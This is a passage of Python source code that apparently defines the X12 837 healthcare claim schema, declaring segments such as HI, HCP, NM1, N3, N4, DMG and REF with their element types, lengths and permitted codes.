codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List 
Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", 
"15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HI", Properties( desc="Anesthesia Related Procedure", position="2310", repeat="1", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BP"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( 
desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BO"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="03", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="04", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="06", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="07", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="08", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="09", ), ), Composite( "C022", 
Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="10", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="11", ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="N", seq="12", ), ), ), Segment( "HI", Properties( desc="Condition Information", position="2310", repeat="2", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), 
Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", 
data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), 
Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", 
data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, 
codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response 
Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), 
position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HCP", Properties( 
desc="Claim Pricing/Repricing Information", position="2410", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=11, codes=[], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), 
position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2310A, parsed_837_2310B, parsed_837_2310C, parsed_837_2310D, parsed_837_2310E, parsed_837_2310F, parsed_837_2320, parsed_837_2400, ) parsed_837_2010CA = Loop( "2010CA", Properties( desc="Patient Name", looptype="", position="0150", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Patient Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["QC"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, 
codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Patient Address", position="0250", repeat="1", req_sit="R", syntax="" ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Patient City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "DMG", Properties( desc="Patient Demographic Information", position="0320", repeat="1", req_sit="R", syntax="P0102 P1011 C1105", ), Element( "DMG01", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D8"], ), ), Element( "DMG02", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=2, codes=[], ), ), Element( "DMG03", Properties( desc="Gender Code", 
req_sit="R", data_type=("ID", "1", "1"), position=3, codes=["F", "M", "U"], ), ), Element( "DMG04", Properties( desc="Marital Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Composite( "C056", Properties( desc="Composite Race or Ethnicity Information", refdes="", repeat="10", req_sit="N", seq="05", ), ), Element( "DMG06", Properties( desc="Citizenship Status Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Element( "DMG07", Properties( desc="Country Code", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), Element( "DMG08", Properties( desc="Basis of Verification Code", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "DMG09", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=9, codes=[], ), ), Element( "DMG10", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=10, codes=[], ), ), Element( "DMG11", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Property and Casualty Claim Number", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["Y4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Property and Casualty Patient Identifier", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), 
